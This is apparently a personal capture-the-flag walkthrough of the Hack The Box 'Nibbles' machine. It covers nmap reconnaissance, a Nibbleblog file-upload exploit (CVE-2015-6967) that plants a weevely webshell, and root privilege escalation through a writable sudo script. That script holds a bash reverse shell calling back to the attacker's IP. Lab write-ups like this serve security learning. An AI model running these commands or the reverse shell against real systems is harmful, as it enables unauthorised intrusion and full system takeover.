First, perform an Nmap scan and initially collect information
- Port 80 is open
- Port 22 is open, the version is OpenSSH 7.2p2
nmap -T4 -sV -Pn 10.10.10.75
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 14:08 CST Nmap scan report for bogon (10.10.10.75) Host is up (0.31s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.52 seconds
Next, add the hosts configuration
echo '10.10.10.75 nibbles.htb' >> /etc/hosts
Visit http://nibbles.htb/ and find that the page only shows Hello World!
Right-click to view the source code, and find that the website may have a /nibbleblog/ directory in the comment information
After accessing the directory, it successfully jumps to the blog page. According to the information in the lower right corner Powered by Nibbleblog, it is judged that the system uses Nibbleblog's CMS
next we go first Exploit DB Search for vulnerabilities related to Nibbleblog, and found that there are two historical vulnerabilities in the blog system:
- SQL injection
- File Upload
According to the EXP information provided on the website, we first try to test the SQL injection vulnerability and found that the system does not have this vulnerability
http://nibbles.htb/nibbleblog/index.php?page=1 SQLMAP failed to inject successfully http://nibbles.htb/nibbleblog/post.php?idpost=1 page prompt 404
Next, search Google for information about the file upload vulnerability, and learn that the CVE corresponding to this vulnerability is CVE-2015-6967
Since the author is going to prepare for the OSCP exam, and only one MSF is allowed to be used in the exam to exploit vulnerabilities, so try not to use MSF during the shooting process
Try to use the following script to attack the target machine
Using this script will directly and automatically upload the local shell file to the target server, so we need to prepare a webshell file. Since the system used by the author is Kali Linux, here I use weevely to generate the webshell
weevely generate gh0stx shell.php
Weevely is a Python-based Web Shell client that can execute commands on remote servers and control them without direct access to target web pages.
The function of the above command is to generate the Web Shell source code file of shell.php with gh0stx as the password
Then use the following command to exploit the vulnerability. After the script is executed, it prompts that the file upload is successful. Next, we need to visit the following link to check whether the upload is successful.
python3 exploit.py --url http://nibbles.htb/nibbleblog/ --username admin --password nibbles --payload shell.php
Visited the root directory and the nibbleblog directory respectively but did not visit
After further searching for information about the vulnerability in Google, after carefully reading the description of the vulnerability, the following information is obtained:
When uploading an image file through the My Pictures plugin, NibbleBlog 4.0.3 The original extension of the uploaded file is preserved. There is no check for this extension or the actual file type, so it may be uploaded PHP file and get code execution.
The default path for uploaded images is:
Next, try to access the following path and find that it can be accessed normally without prompting 404 and other information
Use the following command to connect to weevely's webshell, and execute: system_info to view system-related information
weevely http://nibbles.htb/nibbleblog/content/private/plugins/my_image/image.php gh0stx
At present, we have obtained the permissions of the nibbler user, and we still need to obtain user.txt first.
find / -name "user.txt" cat /home/nibbler/user.txt
Next, enter the privilege escalation stage
Execute sudo -l according to the description information: the user nibbler can execute the /home/nibbler/personal/stuff/monitor.sh script as the root user on the host Nibbles without entering a password.
Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
Trying to read the content of monitor.sh found that an error was reported. The reason for the error is: the current sudo command cannot run without a tty, and the askpass program is not specified.
sudo cat /home/nibbler/personal/stuff/monitor.sh
Next, visit this directory level by level and find that there is no personal folder in the /home/nibbler directory, but personal.zip exists in this directory
Execute the following command to download personal.zip to the local, check the content of monitor.sh after decompression, and find that the script is a linux server health monitoring script
:file_download /home/nibbler/personal.zip /root/personal.zip
So how should the rights be raised next?
Idea: directly create monitor.sh that contains a rebound shell, and then use sudo to run the script, you should be able to directly obtain a shell with root privileges
1. Turn on monitoring
nc -nvlp 65001
2. Create and execute a script that bounces the shell, but failed to bounce back after many attempts. The reason for the error seems to be related to the format, but after checking the code format, there is no problem. Let’s put it aside for now
mkdir -p /home/nibbler/personal/stuff/ touch /home/nibbler/personal/stuff/monitor.sh # Note that it is written here sh file, must write#!/bin/bash, otherwise the execution will fail printf "#!/bin/bash\n/bin/bash -i >& /dev/tcp/10.10.14.18/65001 0>&1\n" > /home/nibbler/personal/stuff/monitor.sh chmod +x /home/nibbler/personal/stuff/monitor.sh sudo /home/nibbler/personal/stuff/monitor.sh
Both printf and echo can use the redirection symbols > and >> to write the output content to the file. When writing the rebound shell code to the monitor.sh file, it involves \n line break, which is written by echo -e, but echo The command does not interpret escape characters correctly, so printf is used here to write
Finally get the flag of the root user